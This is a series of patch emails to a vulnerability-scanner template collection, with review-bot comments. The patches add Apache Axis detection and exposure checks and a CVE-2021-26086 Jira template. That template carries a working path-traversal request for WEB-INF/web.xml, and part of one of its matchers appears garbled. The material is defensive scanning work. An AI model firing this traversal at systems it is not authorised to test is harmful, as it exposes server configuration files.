@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | -**146 directories, 1940 files**. +**146 directories, 1962 files**. From 37695801355bb9c5b888509812e9698d783c725f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 04:48:40 +0530 Subject: [PATCH 47/52] misc update --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index 0c2c3d7052..fb4f8b6520 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -1,4 +1,4 @@ -id: can-i-take-over-dns +id: can-i-take-over-dns-fingerprint info: name: Can I Take Over DNS - Fingerprint From 1685ce08b024b6e575afee33ffbd6c6b69b20211 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 26 Aug 2021 02:11:02 +0000 Subject: [PATCH 48/52] Apache Axis 1 and 2 templates --- .../files/axis-happyaxis-disclosure.yaml | 27 +++++++++++++++++ technologies/apache-axis-detect.yaml | 29 +++++++++++++++++++ 2 files changed, 56 insertions(+) create mode 100644 exposures/files/axis-happyaxis-disclosure.yaml create mode 100644 technologies/apache-axis-detect.yaml diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis-disclosure.yaml new file mode 100644 index 0000000000..583eac2cef --- /dev/null +++ b/exposures/files/axis-happyaxis-disclosure.yaml @@ -0,0 +1,27 @@ +id: axis-happyaxis-disclosure + +info: + name: axis-happyaxis-disclosure + author: dogasantos + severity: info + tags: axis,axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/axis/happyaxis.jsp" + - "{{BaseURL}}/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Axis Happiness Page" + - "Axis2 Happiness Page" + - "java.vendor" + - "Examining Application Server" + condition: or + - type: status + status: + - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml new file mode 100644 index 0000000000..03a5506ec6 --- /dev/null +++ b/technologies/apache-axis-detect.yaml 
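Review bot: The new exposures/files/axis-happyaxis-disclosure.yaml has no `description`, and its `name` only repeats the id, so a finding from it tells a triager nothing about what was exposed or why it matters. Going by the matcher strings (`java.vendor`, `Examining Application Server`), the page appears to print application-server and JVM details. A line such as `description: Axis/Axis2 HappyAxis diagnostic page is reachable and reports application server and JVM configuration.` would record that, with the wording confirmed against a real response. A readable `name` (for example `name: Apache Axis HappyAxis Page Exposure`) would also make scan output easier to sort.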
@@ -0,0 +1,29 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + - type: status + status: + - 200 From 7a468632dcb9e656adc83f32047dd61732b12870 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= Date: Thu, 26 Aug 2021 10:45:56 +0700 Subject: [PATCH 49/52] Create CVE-2021-26086.yaml --- cves/2021/CVE-2021-26086.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-26086.yaml diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml new file mode 100644 index 0000000000..b92aada5f3 --- /dev/null +++ b/cves/2021/CVE-2021-26086.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-26086 + +info: + name: Jira Limited Remote File Read + author: cocxanh + severity: medium + description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + reference: | + - https://jira.atlassian.com/browse/JRASERVER-72695 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 + tags: cve,cve2021,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "JiraImportProgressFilter" + part: body From 39ce8ee5b2b59c628b5cc9815fd994af2ea87f6a Mon Sep 17 00:00:00 2001 
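Review bot: In technologies/apache-axis-detect.yaml the `tags` line lists only `axis2,middleware`, although the description says the template detects both Axis and Axis2. A run filtered on the `axis` tag, which the HappyAxis template in the same commit carries, would skip this one; `tags: axis,axis2,middleware` keeps the two consistent. Separately, the word matcher relies on six generic substrings co-occurring (`Welcome`, `Admin`, `installation`, ...), with `Axis` the only product-specific one, and it also runs against `{{BaseURL}}/`. A comment above the matcher, e.g. `# words taken from the Axis/Axis2 landing page; all six must appear`, would tell whoever tunes it later where the strings come from.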
From: sandeep Date: Thu, 26 Aug 2021 15:03:35 +0530 Subject: [PATCH 50/52] misc updates --- ...-happyaxis-disclosure.yaml => axis-happyaxis.yaml} | 11 +++++++---- technologies/apache-axis-detect.yaml | 6 ++++-- 2 files changed, 11 insertions(+), 6 deletions(-) rename exposures/files/{axis-happyaxis-disclosure.yaml => axis-happyaxis.yaml} (74%) diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis.yaml similarity index 74% rename from exposures/files/axis-happyaxis-disclosure.yaml rename to exposures/files/axis-happyaxis.yaml index 583eac2cef..193c3d184f 100644 --- a/exposures/files/axis-happyaxis-disclosure.yaml +++ b/exposures/files/axis-happyaxis.yaml @@ -1,10 +1,10 @@ -id: axis-happyaxis-disclosure +id: axis-happyaxis info: - name: axis-happyaxis-disclosure + name: Axis Happyaxis Exposure author: dogasantos severity: info - tags: axis,axis2,middleware + tags: axis,axis2,middleware,exposure,apache requests: - method: GET @@ -13,15 +13,18 @@ requests: - "{{BaseURL}}/axis/happyaxis.jsp" - "{{BaseURL}}/axis2-web/HappyAxis.jsp" - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and matchers: - type: word words: - "Axis Happiness Page" - "Axis2 Happiness Page" - - "java.vendor" - "Examining Application Server" + - "Examining Version Service" + - "Examining System Properties" condition: or + - type: status status: - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml index 03a5506ec6..2c9733d95c 100644 --- a/technologies/apache-axis-detect.yaml +++ b/technologies/apache-axis-detect.yaml @@ -5,14 +5,15 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection - tags: axis2,middleware + tags: tech,axis2,middleware,apache requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/axis2/" - "{{BaseURL}}/axis/" - - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word 
@@ -24,6 +25,7 @@ requests: - "installation" - "Admin" condition: and + - type: status status: - 200 From 9ada252cdbb41a4281b9bc395b79da24f8cb9646 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:25:05 +0530 Subject: [PATCH 51/52] misc update --- cves/2021/CVE-2021-26086.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index b92aada5f3..5e33e1cde4 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -13,14 +13,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "JiraImportProgressFilter" + - "" part: body + condition: and From 7a2138a8c809326e586a28e977bfb841ba28354d Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:27:01 +0530 Subject: [PATCH 52/52] few updates --- cves/2021/CVE-2021-26086.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index 5e33e1cde4..d0462007ca 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -1,11 +1,11 @@ id: CVE-2021-26086 info: - name: Jira Limited Remote File Read + name: Jira Limited Local File Read author: cocxanh severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. - reference: | + reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi
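Review bot: In the `@@ -13,14 +13,17 @@` hunk of cves/2021/CVE-2021-26086.yaml, the new `words` entry shows on this page as an empty string `""` under `condition: and`. If the file really contains that, the word matcher would presumably be satisfied by any body, reducing the template to "status 200 on the traversal path". The hunk header counts one more added line than is visible here, so the original strings were probably markup lost in rendering; this should be checked against the file itself. Either way the hunk drops the only Jira-specific token. Keeping `- "JiraImportProgressFilter"` next to the new words, if it is present across affected versions, would stop a generic 200 page or another application's web.xml from being reported as CVE-2021-26086.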